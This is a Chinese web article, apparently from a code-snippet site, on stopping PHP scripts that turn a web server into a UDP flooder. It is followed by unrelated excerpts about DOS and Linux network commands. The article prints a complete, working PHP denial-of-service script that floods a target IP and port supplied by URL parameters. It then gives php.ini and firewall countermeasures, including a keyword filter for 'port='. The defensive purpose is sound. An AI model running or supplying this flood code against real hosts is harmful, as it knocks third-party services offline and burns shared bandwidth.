防止用户利用PHP代码DOS造成用光网络带宽

用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:


复制代码 代码如下:

$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand
\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>

表现特征:
一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.
解决办法:
禁止上述的代码:
在c:\windows\php.ini里设置:
disable_functions =gzinflate;
在c:\windows\php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
前面的;号要保留
然后重启IIS
如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.
另外,对于没加密的php攻击代码,还可以用以下办法处理:
1.在IP策略,或防火墙中,禁止所有udp向外发送
2.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词

时间: 2011-02-27

查看系统网络连接打开端口、系统进程、DOS打开文件的命令

问题描述: DOS查看系统网络连接打开端口.打开的服务 问题解决: (1)DOS查看系统网络连接打开端口 注: 使用    netstat 命令,可以查看系统打开的端口 (2)查看和关闭系统打开进程 注: 使用 taskkill /pid /F  端口号    可以用来关闭指定PID的端口 注: 使用tasklist可以用来查看所有PID (3)DOS打开文件 注: 如上图所示,DOS下使用命令start D: 命令可以直接打开 D盘 (4)DOS下打开Tomcat服务 注: DOS下进入D盘,

DOS下常用的相关网络命令总结

在DOS下的Microsoft Network Client和Windows 9x的DOS窗口等环境中,有许多很有用的但不包含在DOS自带的命令中的网络命令.那么,有哪些这样的命令呢?下面将它们中常用的命令介绍一下. Arp 显示和修改"地址解析协议"(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表.该命令只有在安装了 TCP/IP 协议之后才可用. arp -a [inet_addr] [-N [if_addr]] arp -d inet_addr [if_addr] a

DOS下网络浏览器的使用方法

DOS是个功能十分强大的操作系统,因此它的功能也比较全面.近年来随着网络的发展,网络软件就非常重要了.因此,DOS下近年来也出现了不少相应的软件,其中最重要的莫过于网络浏览器了.这些DOS下的网络浏览器可以分为图形浏览器和文本浏览器两大类.其中Arachne是前者中功能最强大的一个,也最为出名.而后者则有Lynx,Minuet等,下面介绍一下它们的用法. Arachne的最新版本是1.70,可在"DOS软件"中下载.它自带众多网络功能,除通常的FTP,HTTP功能外,还支持POP3/S

DOS下命令符开启wifi无internet访问的解决办法

DOS下命令符开启wifi无internet访问,怎么办,真的很伤脑筋,现在不用烦恼了,看一看下面小编为大家分享的文章,帮助大家解决DOS下命令符开启wifi无internet访问问题. 先按win+R 输入cmd netsh wlan set host mode=allow ssid=nothing key=323435435 (ssid后面的可以任意,key后面最少8个字符) 我的电脑,右键选中属性,选中控制面板 选中网络和internet 选中网络和共享中心 选中更改适配器设置 选中WLA

DOS下常用网络相关命令解释

Arp 显示和修改"地址解析协议"(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表.该命令只有在安装了 TCP/IP 协议之后才可用. arp -a [inet_addr] [-N [if_addr]] arp -d inet_addr [if_addr] arp -s inet_addr ether_addr [if_addr] 参数 -a 通过询问 TCP/IP 显示当前 ARP 项.如果指定了 inet_addr,则只显示指定计算机的 IP 和物理地址. -g 与 -

linux网络相关命令汇总(6)

本文将讲述网络相关命令,作者假定读者具备TCP/IP协议栈的基础知识.对于相关命令及其输出只介绍它的基本的使用方法和大概的描述,具体协议将不作详细解释. 如今网络无疑是很重要的,linux系统中提供了丰富的网络测试与管理命令.我们来一起看看它们. 内容如下: 1.ping 发送TCMP回显请求报文,并等待返回TCMP回显应答. ping [OPTIONS]... destination 这里的目标destination可以是目的IP地址或者域名/主机名 选项-c指定发送请求报文的次数,当ping

研究下DOS下联网的方法

随着计算机和网络的普及,计算机之间的联网操作(如文件的传输,聊天等)以及Internet网络显得越来越重要了.既然DOS有这么多的用户,那么如何 用它来实现联网呢?DR-DOS 7.xx和ROM-DOS 7.xx中自带联网(包括局域网和TCP/IP协议等)的功能,可是我们大家常用的MS-DOS却没有.但是,并不是没有办法,只是需要一些附加的软件. 比较好的有Netware Lite 1.x和Microsoft Network Client 3.0等(均可在本站的"网络工具"中下载),下

DOS下联网的方法

随着计算机和网络的普及,计算机之间的联网操作(如文件的传输,聊天等)以及Internet网络显得越来越重要了.既然DOS有这么多的用户,那么如何 用它来实现联网呢?DR-DOS 7.xx和ROM-DOS 7.xx中自带联网(包括局域网和TCP/IP协议等)的功能,可是我们大家常用的MS-DOS却没有.但是,并不是没有办法,只是需要一些附加的软件. 比较好的有Netware Lite 1.x和Microsoft Network Client 3.0等(均可在本站的"网络工具"中下载),下

DOS下硬件设备的使用与设置

由于电脑的普及和应用的日益深入,为了满足人们的需要,电脑的功能随着它的发展变得越来越强大,硬件设备也越来越多,如从原来的ISA及PCI声卡.调制解调器等到现在的USB硬盘.鼠标等,而且品牌多种多样.那么,我们应该如何在DOS下使用与设置这些设备呢? 其实有很多硬件设备在DOS下不需安装任何的驱动程序,只要硬件或将BIOS设置好就可使用,如键盘,普通的硬盘和支持PCL(打印机控制语言)的打印机 等.在DOS下使用支持PCL的打印机非常容易,因为打印机连接在并行端口(LPT)上,所以通常LPT1或P

DOS下的必备工具

DOS是个非常强大实用的操作系统,有着最多的用户.但是我们在安装了DOS以后,发现DOS自带的命令并不能完成大家所需的各方面的功能.这时,我们就 需要一些其它的软件来实现那些功能.DOS下的实用软件是非常多的,那么,我们应该在其中选择哪些工具作为必备工具来使用呢?下面就来分类讨论一下. 当安装了操作系统后,首先要使整个电脑的硬件发挥出各自的功能,比如鼠标,光驱,声卡等等.这时就需要有相应的驱动程序,而这些驱动程序就是DOS下的必 备工具.这些驱动程序可在本站的"DOS软件"中下载,而安

DOS下测试通讯的常用命令分享(dir&amp;gt;prn)

DOS下测试通讯的常用命令 dir>prn命令 dir>prn 或 dir>lpt1是在DOS下测试通讯的常用方法, 该命令将生成的ASCII文本送到指定的硬件端口. 作者 shanblue

Linux的常用网络命令(二)

使用telnet命令访问远程计算机用户使用telnet命令进行远程登录.该命令允许用户使用telnet协议在远程计算机之间进行通信,用户可以通过网络在远程计算机上登录,就像登录到本地机上执行命令一样. 为了通过telnet登录到远程计算机上,必须知道远程机上的合法用户名和口令.虽然有些系统确实为远程用户提供登录功能,但出于对安全的考虑,要限制来宾的操作权限,因此,这种情况下能使用的功能是很少的.当允许远程用户登录时,系统通常把这些用户放在一个受限制的shell中,以防系统被怀有恶意的或不小心的用